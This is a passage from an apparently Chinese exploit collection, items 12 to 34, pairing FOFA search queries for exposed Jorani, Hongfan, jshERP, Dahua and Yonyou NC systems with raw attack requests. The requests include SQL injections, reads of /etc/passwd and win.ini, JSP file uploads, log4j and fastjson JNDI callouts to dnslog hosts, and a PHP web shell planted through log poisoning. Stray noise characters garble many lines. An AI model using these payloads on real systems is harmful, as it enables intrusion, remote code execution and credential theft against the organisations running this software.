2 i& G" z& [& |. Z9 I6 ~GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.15 u% j$ Z; `% d
Host: 127.0.0.1
2 ] C# I/ x) C0 y. ?6 n0 aPragma: no-cache
G$ u3 r: ^: P, sCache-Control: no-cache
( l* {+ E, @, T1 d" s$ H) \Upgrade-Insecure-Requests: 1
9 |! f; K/ }( Q+ d% s2 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
) B$ f: ~# F& f, J/ lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& @* }& |- m/ W9 l- ?& C1 j J
Accept-Encoding: gzip, deflate( d2 _( a* m8 o" W
Accept-Language: zh-CN,zh;q=0.9,en;q=0.80 h. p: ?; @' O% B8 A2 f
Connection: close
, E0 Q6 v. U4 q$ o& f9 b# O0 l
* k4 y. J' a) n& M! e- v! t' \) o4 y2 B4 T" ]
12. Jorani < 1.0.2 远程命令执行* r- G! G* I( |8 r" W: d
FOFA:title="Jorani") w9 K0 Y: E2 m% i7 w( S
第一步先拿到cookie
: @+ P/ e# l' A9 xGET /session/login HTTP/1.1
. x. T( j# B$ q& o8 hHost: 192.168.190.30
' d" Q* u3 t& r* U/ U P, ^- R mUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
+ r, \1 g* b3 U& |9 t$ l. j9 [/ _Connection: close+ w& w# N6 u' Z3 J2 p3 q, ~
Accept-Encoding: gzip* {& X A2 p0 ? j0 M
! e6 I3 A+ i1 h5 [% ?2 p
/ W$ R9 z( A: W5 q2 L响应中csrf_cookie_jorani用于后续请求. d9 H C. q4 x; ?2 o% Z+ ~
HTTP/1.1 200 OK
2 S5 m& H/ _2 S9 u7 ]Connection: close. C: h* |! i2 r$ K8 }! }6 U* z) ^$ U; w
Cache-Control: no-store, no-cache, must-revalidate
C% v4 u, C. j, X2 G3 _6 nContent-Type: text/html; charset=UTF-8
3 c+ T) j9 b" nDate: Tue, 24 Oct 2023 09:34:28 GMT
; ^- v- d2 {: w4 i, V6 {Expires: Thu, 19 Nov 1981 08:52:00 GMT
3 W- f3 y* |1 V+ v( V( z0 s# e( dLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT
3 T* [( C$ A- l; v. w: ~Pragma: no-cache
2 f" z9 q8 o9 D( z. ~Server: Apache/2.4.54 (Debian)
+ n/ [7 @; W/ d1 ?9 z( M* `/ JSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
6 L' y1 a e7 z1 e/ I) LSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
[3 T" \3 L a+ E1 aVary: Accept-Encoding
/ [6 _6 V( v& C- `% p8 Y) f$ C. v7 m" U' N4 o: @
, N, a+ x% f* dPOST请求,执行函数并进行base64编码
0 h1 a ^ \' v: q1 j- dPOST /session/login HTTP/1.1
% A, o d' g/ z! h) D G& JHost: 192.168.190.30
4 g! _+ w r2 ]# [! PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36- s! W; }& [# A6 L
Connection: close! f+ c8 ]7 x, K1 j. O" @; c! `
Content-Length: 252) t" S4 y# a7 z c
Content-Type: application/x-www-form-urlencoded% R x# b3 K1 D
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
9 F7 Q+ ?" t/ J& R2 e yAccept-Encoding: gzip$ E9 I& m/ h$ m* N7 l' I( R
% c Q ]+ w. x2 g! Jcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
/ ]/ X* |, C6 d. y# p' \4 v L; u
; o8 G6 l0 z3 s/ M( @, g
, Y% J1 o. B5 R; {0 d _9 A9 d2 L, N* V/ N& O0 A% g
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串0 `8 ?2 ?+ |' g2 `( d7 j8 F4 z/ w
GET /pages/view/log-2023-10-24 HTTP/1.18 {- b' g& y, Z+ C' j" ~: @* }
Host: 192.168.190.30) t6 ?$ I; n: a$ J5 A- @6 F: B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36& o X3 R! l0 c! w+ S5 S
Connection: close
; k- s/ @8 d1 h0 Q. A- q5 ~0 eCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
) N" g2 r G9 `8 k8 A+ AK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
8 C; K: U$ B' U0 |X-REQUESTED-WITH: XMLHttpRequest0 r9 Q: I Y9 A# p
Accept-Encoding: gzip
0 q0 d5 I& p3 w3 W% |3 }$ s" R5 W' s5 H
- l' F" S7 I; Z# w8 {2 w4 @3 f6 V( E e2 ?) W
13. 红帆iOffice ioFileDown任意文件读取# O1 [. m9 U D; L7 F7 @; y. U' i7 @3 b
FOFA:app="红帆-ioffice"4 x; @* }. t Z H9 m; {/ _
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1( ?8 D- J; N3 o# V
Host: x.x.x.x- a& E# P: _9 H& I! p! ~
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
- e" v3 R7 j8 F0 [* `6 |9 LConnection: close( Q/ A' ~. {9 s. w( a
Accept: */*
4 q* e F4 p" {2 kAccept-Encoding: gzip
9 V; q+ ^$ t" S+ w" O n A( K( H5 u) G) q
7 x b6 Q/ G% o7 C* o$ ]6 W% x
14. 华夏ERP(jshERP)敏感信息泄露+ n; D/ b; t! d. L$ W
FOFA:body="jshERP-boot"
6 o# N% s1 n& I M! U# B: `5 S泄露内容包括用户名密码
7 _2 u# L2 M3 [* V6 MGET /jshERP-boot/user/getAllList;.ico HTTP/1.1/ h( D" @9 K r- b
Host: x.x.x.x
; P- L/ ~* e* U8 ~/ ~, MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
- X. s, o8 U7 J% _, OConnection: close
9 _( k% E2 E6 O# Q) s+ TAccept: */*
2 _0 ^; |& y) j8 YAccept-Language: en
1 A' s5 }5 L2 u) l" g7 n n4 TAccept-Encoding: gzip
( K" ]8 V% q3 C: V+ X2 A3 Q# c9 o3 ] y; d7 {% m& `# S% s
' T4 r& c1 c0 P8 ]1 ^* k* I
15. 华夏ERP getAllList信息泄露
5 x) _, c* B2 M& A4 P6 z% ~CVE-2024-04905 _1 {% G! g' l- A4 m* C, G
FOFA:body="jshERP-boot"/ @( h) o* u5 w: K/ D' @
泄露内容包括用户名密码2 W9 u$ \/ O' Q1 Z3 J; s
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1& z8 x2 m/ _; X
Host: 192.168.40.130:100
5 q5 {* r. m: h9 Y# B& U' AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
0 i$ S# j: K" jConnection: close" L& S# T$ h/ ? [$ R- h
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
5 V1 X* E+ O! IAccept-Language: en. d/ l; b8 F; M1 f1 r
sec-ch-ua-platform: Windows* E7 Z9 w0 h) J3 q- V8 `
Accept-Encoding: gzip
! J& @) s- P6 `! E( C! j, e, L5 P% \- Y* A
! e% I: A% t6 J+ ?! r
16. 红帆HFOffice医微云SQL注入
* d+ C8 W& k. ~. cFOFA:title="HFOffice"
8 M# Q& f9 H. e* b) B% npoc中调用函数计算1234的md5值
' @% K4 u1 I9 |' ?( _) vGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.13 o9 y' V1 H& O7 u
Host: x.x.x.x! a* K: E! v6 F( M' R
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.363 Z2 }2 y" o8 H+ V
Connection: close0 N& S! u0 E Z/ Q) \/ c* N. H: a
Accept: */*) G' n; x% C3 E6 r- V
Accept-Language: en: C2 U& c, w. `$ x, R% F
Accept-Encoding: gzip
+ X9 o7 p, \, |
9 \4 Y4 h8 i% J2 T5 E- y: A. b5 H6 k
17. 大华 DSS itcBulletin SQL 注入' U6 m3 r6 [9 R0 N
FOFA:app="dahua-DSS"8 n8 @! g1 S5 P, n5 J
POST /portal/services/itcBulletin?wsdl HTTP/1.1
! u0 ~ G& Q7 Z8 c# R6 k% w* I$ VHost: x.x.x.x+ g; e9 |. V: H& H0 B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
4 `5 k7 u0 J( O0 ^, [ ~1 Z( t6 nConnection: close* l% k$ y- d0 N
Content-Length: 345
" V! ]. u9 f7 p! s; BAccept-Encoding: gzip( B: B5 ^3 D; h8 _* \
. a! d) a" T* E! J) z9 M" h
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
( u7 q2 J2 x" |( d$ G# ~<s11:Body>' R! j8 Z( P7 S" B, P" d$ a% g
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>. R' i% C- k2 | w0 Y9 a7 e8 c
<netMarkings>
3 a# }& m0 Z9 s6 a- F( I: [$ U1 p (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1; s& ]8 \$ g* Q. ~3 i) q: X2 l
</netMarkings>. I; v" M5 O2 Q6 @
</ns1:deleteBulletin>
1 B# y$ z3 A6 I- i- e1 D8 k </s11:Body>
1 L0 A( r* H' u6 p</s11:Envelope>, }3 I- o- x, r7 v: u6 ^+ s) |# @
8 G" L+ r" [1 o% U2 A/ e7 i
) N1 e4 D4 `0 K' ?' O18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
: o; g' i- ^ P4 S5 G' mFOFA:app="dahua-DSS"
3 U7 {3 I; o5 A, l6 y2 X: IGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1: p+ a; u2 `3 h* x
Host: your-ip6 x( K4 k! u9 U# w& O( R( x5 \! U4 C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
& d9 i! ?1 X4 ~- rAccept-Encoding: gzip, deflate; L6 N' A( G. Z/ O. O
Accept: */*5 \9 e0 \ t+ q+ M( X
Connection: keep-alive
, E" Y6 U, d' X+ Q. O! E t7 C9 i' y3 s! c' F
0 C, S) q* O7 e4 b" a
' A" _- L" r- C. {9 ~19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
9 o0 R4 R: Y2 A: S9 u+ KFOFA:app="dahua-DSS"
3 O, w3 v% [8 p! hGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1% a) \( v! H7 j9 |7 n. ]( e
Host:4 R$ N9 y$ [% P' u' _# a) v% A
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
' n+ T6 d) P" `6 r4 EAccept-Encoding: gzip, deflate( E: |: p- v a
Accept: */*
. ]9 y4 L2 y; v2 V" l6 T2 aConnection: keep-alive
! X, n1 w2 E2 g4 N+ V$ i4 Z, S. o$ Y/ u% h3 b6 X' V
# N& _4 }3 L0 A' m4 U. ^20. 大华ICC智能物联综合管理平台任意文件读取
0 Q# O/ \2 b- q" N) _; v' H3 bFOFA:body="*客户端会小于800*") ^. H9 k% [% Y, v) @8 q5 k
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.14 c$ B! S5 |9 r# |, l6 C
Host: x.x.x.x
- `7 U) c- s3 |5 O$ kUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36, G6 i L6 n! ]0 R3 s; T( X3 ^: e
Connection: close$ _2 i7 h7 q v
Accept: */*
6 r% P8 o: J! a; Z- x3 J3 yAccept-Language: en
/ y$ R0 b( s% L7 [5 B# wAccept-Encoding: gzip
; b5 ~. d0 w! S$ w( ]
* F m% u: N/ n" _+ S8 |; G& m! M: F8 W/ Y6 Z. ^1 M# K L
21. 大华ICC智能物联综合管理平台random远程代码执行# t* J5 O& k0 G5 i/ s
FOFA:icon_hash="-1935899595"
( T- ]* L6 z6 ?# {1 IPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1% c0 f) n1 v W# E" q
Host: x.x.x.x
7 U9 V5 P$ l4 y7 I; \+ q B: ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( ^6 D# k* F! f' i% E$ t
Content-Length: 161
; g" Z+ y$ }4 k' F" U& \' _Accept-Encoding: gzip
$ J7 C% J8 Y2 D0 V0 h. s5 K, QConnection: close
" ^( V; C# Y' @. n6 cContent-Type: application/json;charset=utf-8, K% `' G. R6 @9 F9 Q ?6 Y' ]
* u& r, e* C0 P4 t/ ^; v/ O0 O{ G+ z6 k9 {4 N2 l' x
"a":{/ {9 L8 B8 T0 I+ H- j+ X
"@type":"com.alibaba.fastjson.JSONObject",; T4 Y- c9 h' j8 t) c
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
! m$ G0 j, x8 H8 q: d: s) ? }""
9 c8 Y( q U. F" K9 a}/ p& e3 u/ f6 g" B
+ I2 K% S# g, Z$ m8 R
, m+ X2 @6 V4 J7 D, C5 [22. 大华ICC智能物联综合管理平台 log4j远程代码执行
. C$ Y% [! w1 F) W. K9 uFOFA:icon_hash="-1935899595"
9 x6 F& Q& `# `0 A1 aPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
# d2 {& B' o; |& G9 d' ?) f: F7 tHost: your-ip
6 I3 {8 p, J& t: @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.369 f& o6 u5 T3 r9 @
Content-Type: application/json;charset=utf-80 n+ R4 R6 n' R6 g0 C' p
6 ~! q; M" \2 w; L9 c* _6 ?{
/ t* _6 M0 s% G& w5 a"loginName":"${jndi:ldap://dnslog}"
`! e% r. S! S) U, h5 A8 n}
9 H+ e# r& Y* L7 n( w1 ]" L. \) s& p
0 M- e( D9 V- `6 n0 a5 ?: w
$ R/ A7 `; W9 K) q; {. n23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
* N5 ]+ g; q6 i* X; RFOFA:icon_hash="-1935899595"/ w" h* v7 G+ B
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.17 V* J% M* i; r9 p# z) s0 C7 B K
Host: your-ip* Y. z( m# y) h* `" D; f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! n, Q9 S7 |; I- [+ j) f5 kContent-Type: application/json;charset=utf-84 [& m2 X5 G( p! X
Accept-Encoding: gzip
7 H2 d7 X: l6 Q3 g3 {8 q. VConnection: close: z. r8 Q/ W0 h8 _0 q& R* _. m
8 O4 X) t" A, W{
4 e! U+ v1 n8 \6 U9 L" g7 i "a":{
8 b! b; S. |7 \( v) q; J "@type":"com.alibaba.fastjson.JSONObject",- ~8 I6 p- X( }
{"@type":"java.net.URL","val":"http://DNSLOG"}
1 a" [2 w; e, ~# v }""
& \) C4 Z; }( T/ ` g5 o}
# M3 N" s, H [9 x! _% A/ g' y8 ^. N; ^8 @; d) n; G4 S4 {& s, [8 e
) Z. q% a$ C1 O1 ]) o" I+ q24. 用友NC 6.5 accept.jsp任意文件上传
5 g3 t0 m; n: D% {; N- _/ x! [: AFOFA:icon_hash="1085941792"7 W( O$ {" x/ z k# s$ }
POST /aim/equipmap/accept.jsp HTTP/1.1% j) V0 Q1 I' N6 D" `0 X3 X4 }
Host: x.x.x.x
" [3 [, W6 J* F* fUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
2 l7 ^, m* \2 g8 C! U3 EConnection: close
' ~6 d$ F/ h( L+ N- g7 t7 S& OContent-Length: 449
. S6 h. D# g8 [# _ L3 JAccept: */*
9 B5 @# D5 s' F, M( UAccept-Encoding: gzip8 Z' M J0 {" b+ R
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc r& S, s( Z/ A$ D! Z
9 S+ a. t. s/ J }1 P-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
. {/ P3 b; V3 @, [8 k( @2 `Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
* e" W3 [& n$ V: s0 fContent-Type: text/plain
8 q6 h% M* x( B
+ X% s; Z" U; O H' D<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>/ |. |* k0 i" y5 q
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc0 }* H$ P% E2 W/ t4 n2 D
Content-Disposition: form-data; name="fname"# j$ m' U- u( |8 D+ B4 `
' r( J: h0 p% d, B* e& ~\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
* I* Y2 P" |2 k/ {! {-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--$ Z& U) {& G! U8 F
: S$ w% {* z! e3 m4 h! o( Z; F2 y) w# ?
25. 用友NC registerServlet JNDI 远程代码执行
# Q- R4 Z; V8 j. [- T$ EFOFA:app="用友-UFIDA-NC"- t$ c( ?- E5 C4 w
POST /portal/registerServlet HTTP/1.1
6 x U5 n0 D5 W$ s2 {) }Host: your-ip& z' q7 }( F8 @ w. Y# S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
" I. M5 A8 }, F+ c3 aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9$ |. |6 v3 \7 h# }; W% @
Accept-Encoding: gzip, deflate/ s0 n8 c& z6 l- V9 @
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6 H. K! |" [8 q# X- x3 E" {3 Z# Z
Content-Type: application/x-www-form-urlencoded% z" C8 T) F7 m$ w! F
. x6 g8 W2 m) [0 r/ B1 Y! i |
type=1&dsname=ldap://dnslog# [: d E4 i* Y3 K% b
" t! e4 S! f! w+ b, T
/ F$ c% |2 z j. T
: k7 Z3 z+ B- _4 Y+ t5 C& G& m26. 用友NC linkVoucher SQL注入
7 d {- z, \+ Q, ]1 CFOFA:app="用友-UFIDA-NC"
1 S8 c0 i' p( Y( N; s d& IGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
: v0 z9 ^- e5 x ~1 SHost: your-ip2 F% U6 H8 r8 N9 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& R! l6 m1 C. F
Content-Type: application/x-www-form-urlencoded/ ^1 S# B" A1 o# |$ y5 A
Accept-Encoding: gzip, deflate- X* V, q, ~0 n+ f. Y
Accept: */*
" v, K" N1 g6 ^. VConnection: keep-alive/ ]& h% t! k6 F) `) G' E
: n& K2 H% w+ M0 N2 Y+ W z
4 n) x% z# p- j$ H1 R5 p$ Z8 G
27. 用友 NC showcontent SQL注入
. R, x3 q! o- I$ TFOFA:icon_hash="1085941792"* i! ?" ^% X9 |- w! H7 z
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
' [1 E! ~' `0 Z$ j/ ]Host: your-ip
, |, i' _. l6 A% Q3 E" MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' P e9 ?3 L# _
Accept-Encoding: identity6 M6 F9 N! S$ d
Connection: close6 p. f) a! ?1 e1 e6 O0 d1 D: J
Content-Type: text/xml; charset=utf-8( j. a3 c& H9 k0 r& @4 w
* I- w4 E" {8 {+ I7 j! r7 k0 r
2 l0 `5 w: Z4 A# J; y! R$ {
28. 用友NC grouptemplet 任意文件上传) P$ Q/ R$ J, p4 H8 V9 E% a
FOFA:icon_hash="1085941792"
/ R6 |* v7 d# y/ z* l, Z4 H* DPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
0 B( P/ q, x" b! i g, }Host: x.x.x.x
% c, M G# ]1 i6 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
- F: j* N) g! }' KConnection: close
) J( D; C0 P6 s0 V' h- t* o- vContent-Length: 268( j5 @9 k4 R- E) z/ q& s3 j
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk. f/ c' a4 }1 u2 E% j/ W
Accept-Encoding: gzip* P# ~. Z7 G: I4 \. X7 V' ?
" S* {2 I/ E3 d/ z4 k. z------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
% D) Z( V: x: [2 s8 q' \( YContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"# `) A3 K5 Z3 N9 X: M" Z9 _
Content-Type: application/octet-stream$ [0 \4 Z7 I5 D$ n
' N/ j. j7 a" T) } g' v<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>; R9 Z3 e/ R9 X
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--* p5 Q0 O' s- B
' a N) M% a+ P/ G& u/ e9 Z: s9 m- |8 f' f1 P' t5 ~
/uapim/static/pages/nc/head.jsp6 k* i2 M+ E& r9 m0 w8 n: K+ i7 {
. N" U1 j+ D( i" d0 U
29. 用友NC down/bill SQL注入
0 e) M1 {- ~+ ~1 H- F" \; Y; jFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
+ V: P$ J* s2 \9 E, k2 r# q/ |; uGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.17 T" ]- ^+ t" e1 |) Z
Host: your-ip( N' X. j7 k+ n" L# s V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 _7 x" X; ^( o- Y6 DContent-Type: application/x-www-form-urlencoded! @$ e" g8 F& T+ l2 D$ P+ r
Accept-Encoding: gzip, deflate {0 B( ~6 ]6 z9 Q! W2 E2 E1 u2 S! l( b+ l
Accept: */*
' Y0 _" L# Q/ T( N7 P" iConnection: keep-alive) u3 m& t+ u7 r+ v
m. J5 C. P8 `
' G( T8 v. K! [' K30. 用友NC importPml SQL注入- j" `* V; z# n, Q: \$ W" n2 j C
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
* i; _ ]7 x2 Q' O' BPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.15 B' V" m) {* Y1 i" g$ d2 s" I* n0 K
Host: your-ip
( K2 _) @+ p( U$ q$ l( |# l3 zContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V L8 _4 l: U9 ]2 S+ d7 K4 B7 `5 V% w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.366 x( U- _+ T5 w1 z, q* y; `
Connection: close
2 X0 H6 r% [7 E( W* a
8 _% e7 J3 N' z2 x------WebKitFormBoundaryH970hbttBhoCyj9V
4 W8 m# U- ~( b a4 ~5 JContent-Disposition: form-data; name="Filedata"; filename="1.jpg"+ b: N8 f1 @+ f) W) A2 S2 e8 L
Content-Type: image/jpeg
" s. W" R+ H: }4 v" z. ~------WebKitFormBoundaryH970hbttBhoCyj9V--
1 {4 O2 M7 C* }0 @- p F m9 Y* j# K! ~2 |
' x; {+ z D/ b# B# e
31. 用友NC runStateServlet SQL注入
$ t4 C% I {$ s x9 C; n; Z7 g) ]version<=6.5- M# _+ y$ I: \+ N( ?
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
. ?, R3 }- V& z0 F( c! Y" MGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
5 V3 U ^' Z, B, H/ E0 } z/ }Host: host `: n8 L; t) Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
8 }- D8 `5 Z7 x( SContent-Type: application/x-www-form-urlencoded# p* s- w8 j q- v1 W
2 p+ W7 q. f9 P' F1 K
: w) U9 E. c8 m" ] z9 h32. 用友NC complainbilldetail SQL注入' d; i6 o7 v* F' c% k+ i% v6 E
version= NC633、NC65
+ ^; B& ^: |- ? U0 gFOFA:app="用友-UFIDA-NC" [( M* f3 g6 C# n
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
" `; U5 X, Y) Z$ ~* p5 CHost: your-ip; L! d( s0 j! [6 I; i8 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 N' T6 v& N- Q8 t6 Y7 RContent-Type: application/x-www-form-urlencoded
% f) J7 d( j2 \5 ZAccept-Encoding: gzip, deflate
o' y/ N( Y; |) |9 g* OAccept: */*1 I; f5 g9 c/ z/ ~7 D
Connection: keep-alive
3 P+ ?6 t" }( s+ I& ~# z% @# s8 C9 u" x% S0 C
+ d4 F) n+ m, N
33. 用友NC downTax/download SQL注入/ V" V" U' T9 \ L" G0 D
version:NC6.5FOFA:app="用友-UFIDA-NC"
7 Y2 h& h* Z4 i& p; g0 Y! s" XGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1% a7 K$ D6 N; u4 _2 ]) s% i+ D- Z
Host: your-ip
4 s. D& B, D# e( r1 H. A" m' T* fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Q6 U) n7 ?! E- wContent-Type: application/x-www-form-urlencoded
! O% r4 N" m7 [' C) Y0 q% pAccept-Encoding: gzip, deflate( o* d) B8 u# p* O5 B; Y: Z' m. A7 K
Accept: */*
5 K5 n+ [3 q5 r& g0 E* j* X1 \: KConnection: keep-alive ~5 H. n: r5 S) N( o9 w
- ^) Q3 U! u: C Z
7 A8 ^6 l* L! R: g8 k34. 用友NC warningDetailInfo接口SQL注入
' z3 y& ~, T8 Y* L* n' iFOFA:app="用友-UFIDA-NC"
! p+ r6 L. ^/ A7 r- z6 SGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
% b/ g/ }+ L$ Q! ]- x$ c IHost: your-ip
/ ~/ S5 T; n( FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 W. p# N4 ]3 W! f" y# {) V T& ^$ W2 hContent-Type: application/x-www-form-urlencoded( P' k K2 o. V; W" R
Accept-Encoding: gzip, deflate5 Z/ u3 Z" k. V2 l% `
Accept: */*
5 C" }$ j. k& [( ?( k. ]7 S7 oConnection: keep-alive
7 q$ e: S' B! l0 R4 W6 j7 t6 z4 x9 J/ M1 L6 m; d! y
$ d* B; {1 B$ x* [" o/ `
